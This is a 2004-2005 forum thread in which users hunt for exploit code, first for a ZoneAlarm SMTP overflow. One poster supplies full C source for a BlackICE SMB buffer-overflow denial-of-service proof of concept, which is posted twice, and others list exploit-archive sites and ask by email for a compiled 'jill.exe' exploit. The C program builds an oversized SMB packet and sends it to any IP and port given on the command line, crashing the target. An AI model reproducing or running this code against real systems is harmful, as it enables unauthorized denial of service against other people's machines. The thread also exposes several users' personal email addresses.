Forums: Looking For This Code! - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Looking For This Code!

#1 User is offline   SecureD 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 137
  • Joined: 09-October 03

Posted 24 February 2004 - 03:12 AM

ZoneAlarm 4.x SMTP Processing Buffer Overflow Vulnerability


somebody got the code already so i can try to compile! :P
0

#2 User is offline   invisible-boy 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 20
  • Joined: 23-February 04

Posted 24 February 2004 - 05:14 AM

me2 but send source code here,it's easy (compile)
0

#3 User is offline   sp00geD 

  • Private
  • Icon
  • Group: Members
  • Posts: 14
  • Joined: 09-February 04

Posted 25 February 2004 - 03:14 PM

i think hxxp://www.k-oitk.com has it
0

#4 Guest_starter_*

  • Group: Guests

Posted 26 February 2004 - 07:39 AM

h**p://www.k-otik.net

this link should work
0

#5 User is offline   R0x0r 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 90
  • Joined: 14-February 04

Posted 26 February 2004 - 07:54 AM

Doesn't work for me... The site.
0

#6 User is offline   DaClueless 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 135
  • Joined: 29-February 04

Posted 04 March 2004 - 11:49 PM

R0x0r, on Feb 26 2004, 03:54 PM, said:

Doesn't work for me... The site.

Here is a DOS version:

/* RS/BlackICE SMB Processing Overflow Vulnerability      */
/* PoC - DOS @ 'BlackICE PC Protection 3.6 ccb'           */
/* happy coding - wanted_bsd_but_just_got_@linuxmail.org  */
/*                                                        */
/* ...code by aZZe               */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char smbxreq[] = {
  0x00, 0x00, 0x01, 0x79, 0xff, 0x53, 0x4d, 0x42,
  0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
  0xff, 0xff, 0x01, 0x00, 0x0d, 0xff, 0x00, 0x00,
  0x00, 0x04, 0x11, 0x0a, 0x00, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c,
  0x01, 0x42, 0x42, 
  /* 300 byte  */
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x00, 
  0x54, 0x48, 0x41, 0x4e, 0x4b, 0x00, 0x59, 0x4f,
  0x55, 0x00, 0x49, 0x53, 0x53, 0x00 
};

int main(int clac, char *cla[])
{
  int sd,x;
  struct sockaddr_in ad;

  if(clac<2){ printf("%s: <ip> <port>\n",cla[0]); return 0; }

  ad.sin_addr.s_addr=inet_addr(cla[1]);
  ad.sin_port=htons(atoi(cla[2]));
  ad.sin_family=2;

  sd=socket(2, 1, 0);if(!sd) printf("no socks\n");
  if(connect(sd,(const struct sockaddr *)&ad,sizeof(ad))!=0)
     printf("no connection\n");
  if((x=send(sd,smbxreq,381,0))<0) {
     printf("no sending\n");
  }
  
  printf("%d bytes on their way to freedom...\n",x);
  close (sd);

  return 0;
}
/* EOF biceZZ.c */

0

#7 User is offline   guufa 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 33
  • Joined: 17-January 04

Posted 05 March 2004 - 11:49 AM

niemic, on Mar 5 2004, 07:49 AM, said:

/* RS/BlackICE SMB Processing Overflow Vulnerability   */
/* PoC - DOS @ 'BlackICE PC Protection 3.6 ccb'      */
/* happy coding - wanted_bsd_but_just_got_@linuxmail.org */
/*                            */
/* ...code by aZZe        */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char smbxreq[] = {
 0x00, 0x00, 0x01, 0x79, 0xff, 0x53, 0x4d, 0x42,
 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
 0xff, 0xff, 0x01, 0x00, 0x0d, 0xff, 0x00, 0x00,
 0x00, 0x04, 0x11, 0x0a, 0x00, 0x01, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c,
 0x01, 0x42, 0x42, 
 /* 300 byte */
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 0x41, 0x41, 0x41, 0x00, 
 0x54, 0x48, 0x41, 0x4e, 0x4b, 0x00, 0x59, 0x4f,
 0x55, 0x00, 0x49, 0x53, 0x53, 0x00 
};

int main(int clac, char *cla[])
{
 int sd,x;
 struct sockaddr_in ad;

 if(clac<2){ printf("%s: <ip> <port>\n",cla[0]); return 0; }

 ad.sin_addr.s_addr=inet_addr(cla[1]);
 ad.sin_port=htons(atoi(cla[2]));
 ad.sin_family=2;

 sd=socket(2, 1, 0);if(!sd) printf("no socks\n");
 if(connect(sd,(const struct sockaddr *)&ad,sizeof(ad))!=0)
   printf("no connection\n");
 if((x=send(sd,smbxreq,381,0))<0) {
   printf("no sending\n");
 }
 
 printf("%d bytes on their way to freedom...\n",x);
 close (sd);

 return 0;
}
/* EOF biceZZ.c */

This is code is for BlackIce exploit, the researched is ZoneAlarm 4.x SMTP Processing Buffer Overflow Vulnerability.
0

#8 User is offline   supermax 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 62
  • Joined: 12-January 04

Posted 08 March 2004 - 12:19 PM

Well is k-optik don't ahve it may be on securityfocus.com or jsut look using google

there is a lsit of site when u can find exploit...

hxxp://www.illmob.org/0day/
hxxp://fux0r.phathookups.com/incoming/
hxxp://members.lycos.co.uk/r34ct/
hxxp://www.w00w00.org/files/
hxxp://www.phreak.org/archives/exploits/
hxxp://www.anyside.com/exploits/remote/leak-sploit.c
hxxp://x82.inetcop.org/h0me/c0de/
hxxp://0days.tk/
0

#9 User is offline   zola 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 28
  • Joined: 29-December 03

Posted 08 March 2004 - 09:56 PM

:rolleyes: anyone know how i can get jill.exe . i tried to compile jill.c numerous ways, from borland, vc++ to emac, but the linux application can't run on windows except i format the diskette.

it works for office writer but i had not test on application.
i also tried to download devc++ but the file is too big and my computer slowing down.
0

#10 User is offline   jtevermore 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 35
  • Joined: 18-February 04

Posted 08 March 2004 - 11:52 PM

zola,

just give me a place i can send it, i get it to you
0

#11 User is offline   zola 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 28
  • Joined: 29-December 03

Posted 08 April 2004 - 04:41 PM

jvetermore, you are really something.

you can send it through my e-mail, zol@chelsea-mad.co.uk

i hope i can pay you back
0

#12 User is offline   greatdane 

  • Private
  • Icon
  • Group: Members
  • Posts: 9
  • Joined: 28-January 04

Posted 25 April 2005 - 01:47 AM

jtevermore, on Mar 9 2004, 07:52 AM, said:

zola,

just give me a place i can send it, i get it to you


could u pleace send jill.exe to me to plz, greatdane4k@yahoo.com

every time i try to compile, no works :(
0

#13 User is offline   EviL 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 175
  • Joined: 11-October 03

Posted 25 April 2005 - 02:26 AM

jtevermore, on Mar 9 2004, 07:52 AM, said:

zola,

just give me a place i can send it, i get it to you



can u sent me too pliz? :)

fede.suxac@gmail.com

tnx :D
0

#14 User is offline   vnet576 

  • Specialist
  • Icon
  • Group: Members
  • Posts: 1,000
  • Joined: 01-August 03

Posted 25 April 2005 - 06:43 AM

Whats this with people posting their emails to get compiled code? Thats not what this board is about. If you have problems compiling code then post what line the compiler is giving you errors with. Don't blatantly request the exe and ask people to mail it to you.

Those who requested and posted their email email addresses will get a warning point. If anyone posts the compiled exe in this topic, they will recieve 2 warning points. :angry:
0

#15 User is offline   toe 

  • Staff Sergeant
  • Icon
  • Group: Members
  • Posts: 271
  • Joined: 10-November 04

Posted 29 April 2005 - 09:20 PM

ok ive got a problem. Dev C++ latest version i getogn the error:
unrecognized command line option "-fdollar-in-identifiers"
its crap and really anoying.

-toe
0

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting